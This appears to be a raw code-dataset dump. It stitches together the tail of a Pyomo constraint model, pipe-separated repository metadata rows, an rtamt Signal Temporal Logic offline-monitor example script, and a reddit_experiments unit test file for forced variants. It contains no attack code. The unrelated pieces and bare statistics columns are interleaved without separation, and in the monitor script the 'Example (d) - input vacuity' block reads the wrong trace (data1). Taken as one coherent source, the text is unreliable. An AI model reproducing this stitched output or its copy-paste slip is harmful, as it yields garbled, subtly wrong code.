m.c21 = Constraint(expr=6.36167292350403e-5*m.x7 - m.x32*(6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8 +
0.00114135256538535*m.x9 + 0.00274075394854443*m.x10 + 0.00548438828108048*m.x11) == 0)
m.c22 = Constraint(expr=0.367084193942431*m.x8 - m.x33*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*
m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c23 = Constraint(expr=0.275347581122294*m.x8 - m.x34*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*
m.x8 + 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c24 = Constraint(expr=0.114670766025168*m.x8 - m.x35*(0.00799040096048009*m.x4 + 0.0255769561603844*m.x5 +
0.0511679852758392*m.x6 + 0.0818892538741687*m.x7 + 0.114670766025168*m.x8 + 0.146807956791712*
m.x9 + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c25 = Constraint(expr=0.0286354282546281*m.x8 - m.x36*(0.001596161920384*m.x5 + 0.00638720256256101*m.x6 +
0.0153350375081317*m.x7 + 0.0286354282546281*m.x8 + 0.0458315860606947*m.x9 + 0.0660172990246554
*m.x10 + 0.0880472935145168*m.x11) == 0)
m.c26 = Constraint(expr=0.00428779555860749*m.x8 - m.x37*(0.000318721407871794*m.x6 + 0.00153062807182051*m.x7 +
0.00428779555860749*m.x8 + 0.00915141635884911*m.x9 + 0.0164795558845939*m.x10 +
0.0263778458318911*m.x11) == 0)
m.c27 = Constraint(expr=0.00035646756425478*m.x8 - m.x38*(6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8 +
0.00114135256538535*m.x9 + 0.00274075394854443*m.x10 + 0.00548438828108048*m.x11) == 0)
m.c28 = Constraint(expr=1.26927914843577e-5*m.x8 - m.x39*(1.26927914843577e-5*m.x8 + 8.12907690382152e-5*m.x9 +
0.000292844463262116*m.x10 + 0.000781426623017516*m.x11) == 0)
m.c29 = Constraint(expr=0.335603041715*m.x9 - m.x40*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*
m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c30 = Constraint(expr=0.2937261297672*m.x9 - m.x41*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*
m.x8 + 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c31 = Constraint(expr=0.146807956791712*m.x9 - m.x42*(0.00799040096048009*m.x4 + 0.0255769561603844*m.x5 +
0.0511679852758392*m.x6 + 0.0818892538741687*m.x7 + 0.114670766025168*m.x8 + 0.146807956791712*
m.x9 + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c32 = Constraint(expr=0.0458315860606947*m.x9 - m.x43*(0.001596161920384*m.x5 + 0.00638720256256101*m.x6 +
0.0153350375081317*m.x7 + 0.0286354282546281*m.x8 + 0.0458315860606947*m.x9 + 0.0660172990246554
*m.x10 + 0.0880472935145168*m.x11) == 0)
m.c33 = Constraint(expr=0.00915141635884911*m.x9 - m.x44*(0.000318721407871794*m.x6 + 0.00153062807182051*m.x7 +
0.00428779555860749*m.x8 + 0.00915141635884911*m.x9 + 0.0164795558845939*m.x10 +
0.0263778458318911*m.x11) == 0)
m.c34 = Constraint(expr=0.00114135256538535*m.x9 - m.x45*(6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8 +
0.00114135256538535*m.x9 + 0.00274075394854443*m.x10 + 0.00548438828108048*m.x11) == 0)
m.c35 = Constraint(expr=8.12907690382152e-5*m.x9 - m.x46*(1.26927914843577e-5*m.x8 + 8.12907690382152e-5*m.x9 +
0.000292844463262116*m.x10 + 0.000781426623017516*m.x11) == 0)
m.c36 = Constraint(expr=2.53144535458066e-6*m.x9 - m.x47*(2.53144535458066e-6*m.x9 + 1.82409993524627e-5*m.x10 +
7.30205954460765e-5*m.x11) == 0)
m.c37 = Constraint(expr=0.302020066201112*m.x10 - m.x48*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*
m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c38 = Constraint(expr=0.302133422913057*m.x10 - m.x49*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*
m.x8 + 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c39 = Constraint(expr=0.176200402504464*m.x10 - m.x50*(0.00799040096048009*m.x4 + 0.0255769561603844*m.x5 +
0.0511679852758392*m.x6 + 0.0818892538741687*m.x7 + 0.114670766025168*m.x8 + 0.146807956791712*
m.x9 + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c40 = Constraint(expr=0.0660172990246554*m.x10 - m.x51*(0.001596161920384*m.x5 + 0.00638720256256101*m.x6 +
0.0153350375081317*m.x7 + 0.0286354282546281*m.x8 + 0.0458315860606947*m.x9 + 0.0660172990246554
*m.x10 + 0.0880472935145168*m.x11) == 0)
m.c41 = Constraint(expr=0.0164795558845939*m.x10 - m.x52*(0.000318721407871794*m.x6 + 0.00153062807182051*m.x7 +
0.00428779555860749*m.x8 + 0.00915141635884911*m.x9 + 0.0164795558845939*m.x10 +
0.0263778458318911*m.x11) == 0)
m.c42 = Constraint(expr=0.00274075394854443*m.x10 - m.x53*(6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8 +
0.00114135256538535*m.x9 + 0.00274075394854443*m.x10 + 0.00548438828108048*m.x11) == 0)
m.c43 = Constraint(expr=0.000292844463262116*m.x10 - m.x54*(1.26927914843577e-5*m.x8 + 8.12907690382152e-5*m.x9 +
0.000292844463262116*m.x10 + 0.000781426623017516*m.x11) == 0)
m.c44 = Constraint(expr=1.82409993524627e-5*m.x10 - m.x55*(2.53144535458066e-6*m.x9 + 1.82409993524627e-5*m.x10 +
7.30205954460765e-5*m.x11) == 0)
m.c45 = Constraint(expr=5.04667648751466e-7*m.x10 - m.x56*(5.04667648751466e-7*m.x10 + 4.04097807027501e-6*m.x11) == 0)
m.c46 = Constraint(expr=0.268435410656179*m.x11 - m.x57*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*
m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c47 = Constraint(expr=0.302140983052761*m.x11 - m.x58*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*
m.x8 + 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c48 = Constraint(expr=0.201402121569511*m.x11 - m.x59*(0.00799040096048009*m.x4 + 0.0255769561603844*m.x5 +
0.0511679852758392*m.x6 + 0.0818892538741687*m.x7 + 0.114670766025168*m.x8 + 0.146807956791712*
m.x9 + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c49 = Constraint(expr=0.0880472935145168*m.x11 - m.x60*(0.001596161920384*m.x5 + 0.00638720256256101*m.x6 +
0.0153350375081317*m.x7 + 0.0286354282546281*m.x8 + 0.0458315860606947*m.x9 + 0.0660172990246554
*m.x10 + 0.0880472935145168*m.x11) == 0)
m.c50 = Constraint(expr=0.0263778458318911*m.x11 - m.x61*(0.000318721407871794*m.x6 + 0.00153062807182051*m.x7 +
0.00428779555860749*m.x8 + 0.00915141635884911*m.x9 + 0.0164795558845939*m.x10 +
0.0263778458318911*m.x11) == 0)
m.c51 = Constraint(expr=0.00548438828108048*m.x11 - m.x62*(6.36167292350403e-5*m.x7 + 0.00035646756425478*m.x8 +
0.00114135256538535*m.x9 + 0.00274075394854443*m.x10 + 0.00548438828108048*m.x11) == 0)
m.c52 = Constraint(expr=0.000781426623017516*m.x11 - m.x63*(1.26927914843577e-5*m.x8 + 8.12907690382152e-5*m.x9 +
0.000292844463262116*m.x10 + 0.000781426623017516*m.x11) == 0)
m.c53 = Constraint(expr=7.30205954460765e-5*m.x11 - m.x64*(2.53144535458066e-6*m.x9 + 1.82409993524627e-5*m.x10 +
7.30205954460765e-5*m.x11) == 0)
m.c54 = Constraint(expr=4.04097807027501e-6*m.x11 - m.x65*(5.04667648751466e-7*m.x10 + 4.04097807027501e-6*m.x11) == 0)
m.c55 = Constraint(expr=1.0056984172397e-7*m.x11 - 1.0056984172397e-7*m.x66*m.x11 == 0)
m.c56 = Constraint(expr= 0.200000000000001*m.x2 - 436*m.x12 - m.x67 + m.x77 == 0)
m.c57 = Constraint(expr= 0.36001600160016*m.x3 - 436*m.x13 - 288*m.x14 - m.x68 + m.x78 == 0)
m.c58 = Constraint(expr= 0.488038405760964*m.x4 - 436*m.x15 - 288*m.x16 - 185*m.x17 - m.x69 + m.x79 == 0)
m.c59 = Constraint(expr= 0.590461451522498*m.x5 - 436*m.x18 - 288*m.x19 - 185*m.x20 - 75*m.x21 - m.x70 + m.x80 == 0)
m.c60 = Constraint(expr= 0.672401937412355*m.x6 - 436*m.x22 - 288*m.x23 - 185*m.x24 - 75*m.x25 - 19*m.x26 - m.x71
+ m.x81 == 0)
m.c61 = Constraint(expr= 0.737954326124241*m.x7 - 436*m.x27 - 288*m.x28 - 185*m.x29 - 75*m.x30 - 19*m.x31 - 4*m.x32
- m.x72 + m.x82 == 0)
m.c62 = Constraint(expr= 0.790394925258872*m.x8 - 436*m.x33 - 288*m.x34 - 185*m.x35 - 75*m.x36 - 19*m.x37 - 4*m.x38
- 2*m.x39 - m.x73 + m.x83 == 0)
m.c63 = Constraint(expr= 0.832345305473249*m.x9 - 436*m.x40 - 288*m.x41 - 185*m.x42 - 75*m.x43 - 19*m.x44 - 4*m.x45
- 2*m.x46 - m.x74 + m.x84 == 0)
m.c64 = Constraint(expr= 0.865903090606706*m.x10 - 436*m.x48 - 288*m.x49 - 185*m.x50 - 75*m.x51 - 19*m.x52 - 4*m.x53
- 2*m.x54 - m.x75 + m.x85 == 0)
m.c65 = Constraint(expr= 0.892746631672324*m.x11 - 436*m.x57 - 288*m.x58 - 185*m.x59 - 75*m.x60 - 19*m.x61 - 4*m.x62
- 2*m.x63 - m.x76 + m.x86 == 0)
m.c66 = Constraint(expr= m.x2 + 2*m.x3 + 3*m.x4 + 4*m.x5 + 5*m.x6 + 6*m.x7 + 7*m.x8 + 8*m.x9 + 9*m.x10 + 10*m.x11
== 10000)
m.c67 = Constraint(expr= m.x2 + m.x3 + m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 436)
m.c68 = Constraint(expr= m.x3 + m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 288)
m.c69 = Constraint(expr= m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 185)
m.c70 = Constraint(expr= m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 75)
m.c71 = Constraint(expr= m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 19)
m.c72 = Constraint(expr= m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 4)
m.c73 = Constraint(expr= m.x8 + m.x9 + m.x10 + m.x11 >= 2)
m.c74 = Constraint(expr= m.x9 + m.x10 + m.x11 >= 0)
m.c75 = Constraint(expr= m.x10 + m.x11 >= 0)
m.c76 = Constraint(expr= m.x11 >= 0)
m.c77 = Constraint(expr= - m.x1 + m.x2 + m.x3 + m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 == 0)
| 64.591281
| 120
| 0.627167
| 3,729
| 23,705
| 3.98686
| 0.084473
| 0.011973
| 0.080985
| 0.115692
| 0.74514
| 0.73236
| 0.731217
| 0.729804
| 0.728863
| 0.653528
| 0
| 0.489466
| 0.203037
| 23,705
| 366
| 121
| 64.76776
| 0.29748
| 0.028602
| 0
| 0.338346
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003759
| 0
| 0.003759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ec5eb414078945655ab0fa8739f75c1900af0e5
| 10,665
|
py
|
Python
|
examples/offline_monitors/offline_monitor_discrete_time.py
|
xiaoyaooo/rtamt
|
edb7bf664720c52e9d70920102c450b1f593af95
|
[
"BSD-3-Clause"
] | 24
|
2019-12-04T00:20:16.000Z
|
2022-03-24T17:48:14.000Z
|
examples/offline_monitors/offline_monitor_discrete_time.py
|
xiaoyaooo/rtamt
|
edb7bf664720c52e9d70920102c450b1f593af95
|
[
"BSD-3-Clause"
] | 142
|
2020-01-16T15:36:21.000Z
|
2022-03-28T20:40:45.000Z
|
examples/offline_monitors/offline_monitor_discrete_time.py
|
xiaoyaooo/rtamt
|
edb7bf664720c52e9d70920102c450b1f593af95
|
[
"BSD-3-Clause"
] | 17
|
2020-07-07T20:32:08.000Z
|
2022-03-07T07:20:22.000Z
|
#!/usr/bin/env python
import sys
import csv
import rtamt
import os
from rtamt.spec.stl.discrete_time.specification import Semantics
def monitor():
# Load traces
data1 = read_csv('example1.csv')
data2 = read_csv('example2.csv')
data3 = read_csv('example3.csv')
data4 = read_csv('example4.csv')
# # #
#
# Example (a) - standard robustness
#
# # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req>=3) implies (eventually[0:5](gnt>=3)))'
spec.semantics = Semantics.STANDARD
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data1[' gnt'])):
rob = spec.update(i, [('req', data1[' req'][i][1]), ('gnt', data1[' gnt'][i][1])])
print('Example (a) - standard robustness: {}'.format(rob))
# # #
#
# Example (a) - output robustness
#
# # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req>=3) implies (eventually[0:5](gnt>=3)))'
spec.semantics = Semantics.OUTPUT_ROBUSTNESS
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data1[' gnt'])):
rob = spec.update(i, [('req', data1[' req'][i][1]), ('gnt', data1[' gnt'][i][1])])
print('Example (a) - output robustness: {}'.format(rob))
# # #
#
# Example (a) - input vacuity
#
# # # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.INPUT_VACUITY
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data1[' gnt'])):
rob = spec.update(i, [('req', data1[' req'][i][1]), ('gnt', data1[' gnt'][i][1])])
print('Example (a) - input vacuity: {}'.format(rob))
# # #
#
# Example (b) - standard robustness
#
# # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.STANDARD
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data2[' gnt'])):
rob = spec.update(i, [('req', data2[' req'][i][1]), ('gnt', data2[' gnt'][i][1])])
print('Example (b) - standard robustness: {}'.format(rob))
# # #
#
# Example (b) - output robustness
#
# # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.OUTPUT_ROBUSTNESS
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data2[' gnt'])):
rob = spec.update(i, [('req', data2[' req'][i][1]), ('gnt', data2[' gnt'][i][1])])
print('Example (b) - output robustness: {}'.format(rob))
# # #
#
# Example (b) - input vacuity
#
# # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.INPUT_VACUITY
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data2[' gnt'])):
rob = spec.update(i, [('req', data2[' req'][i][1]), ('gnt', data2[' gnt'][i][1])])
print('Example (b) - input vacuity: {}'.format(rob))
# # #
#
# Example (c) - standard robustness
#
# # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.STANDARD
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data3[' gnt'])):
rob = spec.update(i, [('req', data3[' req'][i][1]), ('gnt', data3[' gnt'][i][1])])
print('Example (c) - standard robustness: {}'.format(rob))
# # #
#
# Example (c) - output robustness
#
# # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.OUTPUT_ROBUSTNESS
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data3[' gnt'])):
rob = spec.update(i, [('req', data3[' req'][i][1]), ('gnt', data3[' gnt'][i][1])])
print('Example (c) - output robustness: {}'.format(rob))
# # #
#
# Example (c) - input vacuity
#
# # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.INPUT_VACUITY
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data3[' gnt'])):
rob = spec.update(i, [('req', data3[' req'][i][1]), ('gnt', data3[' gnt'][i][1])])
print('Example (c) - input vacuity: {}'.format(rob))
# # # #
# #
# # Example (d) - standard robustness
# #
# # # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example d'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.STANDARD
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data4[' gnt'])):
rob = spec.update(i, [('req', data4[' req'][i][1]), ('gnt', data4[' gnt'][i][1])])
print('Example (d) - standard robustness: {}'.format(rob))
# # # #
# #
# # Example (d) - output robustness
# #
# # # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example d'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.OUTPUT_ROBUSTNESS
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data4[' gnt'])):
rob = spec.update(i, [('req', data4[' req'][i][1]), ('gnt', data4[' gnt'][i][1])])
print('Example (d) - output robustness: {}'.format(rob))
#
# # # #
# #
# # Example (d) - input vacuity
# #
# # # #
spec = rtamt.STLDiscreteTimeSpecification(1)
spec.name = 'Example 1'
spec.declare_var('req', 'float')
spec.declare_var('gnt', 'float')
spec.declare_var('out', 'float')
spec.set_var_io_type('req', 'input')
spec.set_var_io_type('gnt', 'output')
spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
spec.semantics = Semantics.INPUT_VACUITY
try:
spec.parse()
spec.pastify()
except rtamt.STLParseException as err:
print('STL Parse Exception: {}'.format(err))
sys.exit()
for i in range(len(data1[' gnt'])):
rob = spec.update(i, [('req', data1[' req'][i][1]), ('gnt', data1[' gnt'][i][1])])
print('Example (d) - input vacuity: {}'.format(rob))
def read_csv(filename):
f = open(filename, 'r')
reader = csv.reader(f)
headers = next(reader, None)
column = {}
for h in headers:
column[h] = []
for row in reader:
for h, v in zip(headers, row):
column[h].append((float(row[0]), float(v)))
return column
if __name__ == '__main__':
# Process arguments
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
monitor()
| 29.957865
| 90
| 0.572808
| 1,340
| 10,665
| 4.458955
| 0.073881
| 0.066276
| 0.084351
| 0.076318
| 0.913808
| 0.854226
| 0.854059
| 0.854059
| 0.854059
| 0.851715
| 0
| 0.017072
| 0.236568
| 10,665
| 355
| 91
| 30.042254
| 0.716777
| 0.045945
| 0
| 0.842975
| 0
| 0
| 0.218075
| 0.005176
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008264
| false
| 0
| 0.020661
| 0
| 0.033058
| 0.099174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7edead2c9a55c204e33cab0245db505c43d862ea
| 5,566
|
py
|
Python
|
tests/providers/forced_variant_tests.py
|
isugimpy/experiments.py
|
ddfcd6fd010c8806a88cd3c51f55332d857622c5
|
[
"BSD-3-Clause"
] | 5
|
2021-04-04T05:24:47.000Z
|
2021-08-12T21:42:23.000Z
|
tests/providers/forced_variant_tests.py
|
Seanpm2001-reddit/experiments.py
|
c5f8373d051845ab550a9ae65041afcc4c9f996b
|
[
"BSD-3-Clause"
] | 1
|
2021-04-06T02:06:50.000Z
|
2021-05-17T15:34:59.000Z
|
tests/providers/forced_variant_tests.py
|
Seanpm2001-reddit/experiments.py
|
c5f8373d051845ab550a9ae65041afcc4c9f996b
|
[
"BSD-3-Clause"
] | 4
|
2021-04-08T10:02:42.000Z
|
2022-01-12T22:16:46.000Z
|
import time
import unittest
from datetime import datetime
from datetime import timedelta
from reddit_experiments.providers import ISO_DATE_FMT
from reddit_experiments.providers import parse_experiment
from reddit_experiments.providers.forced_variant import ForcedVariantExperiment
THIRTY_DAYS = timedelta(days=30).total_seconds()
class TestForcedVariantExperiment(unittest.TestCase):
def test_unknown_type_returns_null_experiment(self):
cfg = {
"id": 1,
"name": "test",
"owner": "test",
"type": "unknown",
"version": "1",
"start_ts": time.time() - THIRTY_DAYS,
"stop_ts": time.time() + THIRTY_DAYS,
"experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
}
experiment = parse_experiment(cfg)
self.assertTrue(isinstance(experiment, ForcedVariantExperiment))
self.assertIs(experiment.variant(), None)
self.assertFalse(experiment.should_log_bucketing())
def test_global_override_returns_forced_variant(self):
cfg = {
"id": 1,
"name": "test",
"owner": "test",
"type": "r2",
"version": "1",
"start_ts": time.time() - THIRTY_DAYS,
"stop_ts": time.time() + THIRTY_DAYS,
"global_override": "foo",
"experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
}
experiment = parse_experiment(cfg)
self.assertTrue(isinstance(experiment, ForcedVariantExperiment))
def test_disable_returns_forced_variant(self):
cfg = {
"id": 1,
"name": "test",
"owner": "test",
"type": "r2",
"version": "1",
"start_ts": time.time() - THIRTY_DAYS,
"stop_ts": time.time() + THIRTY_DAYS,
"enabled": False,
"experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
}
experiment = parse_experiment(cfg)
self.assertTrue(isinstance(experiment, ForcedVariantExperiment))
def test_before_start_ts_returns_forced_variant(self):
cfg = {
"id": 1,
"name": "test",
"owner": "test",
"type": "r2",
"version": "1",
"start_ts": time.time() + THIRTY_DAYS,
"stop_ts": time.time() + THIRTY_DAYS * 2,
"enabled": True,
"experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
}
experiment = parse_experiment(cfg)
self.assertTrue(isinstance(experiment, ForcedVariantExperiment))
def test_after_stop_ts_returns_forced_variant(self):
cfg = {
"id": 1,
"name": "test",
"owner": "test",
"type": "r2",
"version": "1",
"start_ts": time.time() - THIRTY_DAYS * 2,
"stop_ts": time.time() - THIRTY_DAYS,
"enabled": True,
"experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
}
experiment = parse_experiment(cfg)
self.assertTrue(isinstance(experiment, ForcedVariantExperiment))
def test_after_expires_returns_forced_variant(self):
expires = (datetime.now() - timedelta(days=30)).strftime(ISO_DATE_FMT)
cfg = {
"id": 1,
"name": "test",
"owner": "test",
"type": "r2",
"version": "1",
"expires": expires,
"enabled": True,
"experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
}
experiment = parse_experiment(cfg)
self.assertTrue(isinstance(experiment, ForcedVariantExperiment))
def test_expires_ignores_start_ts(self):
expires = (datetime.now() + timedelta(days=30)).strftime(ISO_DATE_FMT)
cfg = {
"id": 1,
"name": "test",
"owner": "test",
"type": "r2",
"version": "1",
"start_ts": time.time() + THIRTY_DAYS,
"expires": expires,
"enabled": True,
"experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
}
experiment = parse_experiment(cfg)
self.assertFalse(isinstance(experiment, ForcedVariantExperiment))
def test_start_ts_and_stop_ts_ignore_expires(self):
expires = (datetime.now() - timedelta(days=30)).strftime(ISO_DATE_FMT)
cfg = {
"id": 1,
"name": "test",
"owner": "test",
"type": "r2",
"version": "1",
"start_ts": time.time() - THIRTY_DAYS,
"stop_ts": time.time() + THIRTY_DAYS,
"expires": expires,
"enabled": True,
"experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
}
experiment = parse_experiment(cfg)
self.assertFalse(isinstance(experiment, ForcedVariantExperiment))
def test_forced_variant(self):
experiment = ForcedVariantExperiment("foo")
self.assertIs(experiment.variant(), "foo")
self.assertFalse(experiment.should_log_bucketing())
def test_forced_variant_null(self):
experiment = ForcedVariantExperiment(None)
self.assertIs(experiment.variant(), None)
self.assertFalse(experiment.should_log_bucketing())
| 37.608108
| 100
| 0.557672
| 549
| 5,566
| 5.437158
| 0.125683
| 0.01608
| 0.037521
| 0.058961
| 0.80469
| 0.78057
| 0.7799
| 0.769514
| 0.750419
| 0.740034
| 0
| 0.022652
| 0.294107
| 5,566
| 147
| 101
| 37.863946
| 0.737083
| 0
| 0
| 0.721805
| 0
| 0
| 0.147682
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.075188
| false
| 0
| 0.052632
| 0
| 0.135338
| 0
| 0
| 0
| 0
| null | 0
| 0
